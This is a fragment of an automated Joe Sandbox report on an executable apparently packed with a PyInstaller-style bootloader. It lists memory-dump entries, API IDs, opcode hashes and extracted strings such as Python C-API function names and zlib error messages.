                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction ID: 1d7509ee1532f1454ecd7224329401a4908d6d84c1a43419871d158657c5c943
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9218411F2E64243FEB47775A554279B6829F84790FC842BDDE1E873D5CE6CE4458320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction ID: ad9ec76264aea28935b10350e32ed3fb3e8805d39d2e7803bda3676b644f2c5b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9041D43291A20187FA34AF35A545279F3A0FB55B44F90417EDF8E83691CF2DE402CB61
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                              • Instruction ID: 6bfb71484e6a1b8d4f838adcb1625fb6a13e43a7fa028ee07bbe339bd4c1f22f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a04a6dff0443a84ee3e7d7b85ba5df040c793d2a730aad3af21426add8a99984
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9721B121B0A65696FA20FA3265043BAF651BF46BC4FCC547CEE4D07786CE3DE0468724
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                              • Instruction ID: 6b8bf6177bb9be6ffb9c968d0fcd6f2a0594761ba53678f265a9d87e9241a1d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1316E21A1A65286F7617F75884537CBA60AB80B94FD202BEEE6D033D2DF7CE4418731
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                              • Instruction ID: 752ae3d0c7dfe6b4bea882f549b36a31d136c380c0ae97be4f7b21df04c66dc9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08216932A067828AFB24AF74C4842AC73B4EB04718F94567EDA2D06AD5DF38D584CB60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: 67f9aabfb1a49d3fd99ff180013b838c2008757056d4f7a47f9ebaafc666cf7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0115122A1E64292FA70BF61940127EF264AF85B80FC440BEEF4C57E96DF3DD6408760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction ID: 9271a2c0a03025514c4abb32fe168842053f75dfb0eee4508278956e07317af4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF219872E1D6818AEB759F28D44137AB660EB84B54F94427CEA5D476D5DF3CD4008B10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction ID: 6bd280a2834a2043cdb1af0ed4d72567760e637bd3f66531c0926c4d58f631f1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5601A561A0974141F924EF725902169F691AF86FE0F88867DDE5C17BD6CE3CE5018710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,00000000,00007FF79A32B39A,?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA), ref: 00007FF79A32EC5D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                              • Instruction ID: 89a893273a7edb4baca4a044127127f6ccb7cfc2c244ccaf4da8dc15a3e0f0c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF04F50B0B61640FE747AB254922B5B6905FC4B84FDC54BCCD0E462D1DE2CA4808230
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF79A320D00,?,?,?,00007FF79A32236A,?,?,?,?,?,00007FF79A323B59), ref: 00007FF79A32D6AA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction ID: 43981e17545ad3b6d0ad05ae6b51d6c06c424fea9fa29da47af638cf7ef42113
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01F03410E0F20244FEB47AB259512B8B2908F94BE0FC902BCAC2E856C2DE2CA4808230
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315830
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315842
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315879
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31588B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158A4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158B6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158CF
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158E1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158FD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31590F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31592B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31593D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315959
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31596B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315987
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315999
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3159B5
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3159C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                              • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction ID: 7774e550fba4a19efac0ed499f34c5a1cf86634025bda278acaaa905111b6cda
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE227D24E0FB0791FA75FF75A8582B4F2A0AF04785FC591BDD82E02660EF7CA5588360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 808467561-2761157908
                                                                                                                                                                                                                              • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                              • Instruction ID: 6fed202f26f16e7b64d93bcd576f8644637479fea680ed2187693334f9ee20b5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BB2AD72E1E2828AFB749F74D5407F9B7A1FB54389FC0517DDA0A57A88DF38A9008B50
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                                                                                              • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                              • Instruction ID: 779b2da11932e4281ed2805a52b4313ebb0137b7219abde4b8222b5b4a8823f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C521572A156A68BE7A4DF24C498B7E7BE9FB44341F81813DE64A87780DB3CD844CB50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                              • Instruction ID: 20b701dc6ffc5b028bacd0d82e696e89ffd76408bc77ba66904c324212a735c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE311D72A0AA8186FB709F60E8443EEB364FB85744F84453EDA4E47B94EF38D548C720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335CB5
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A335608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33561C
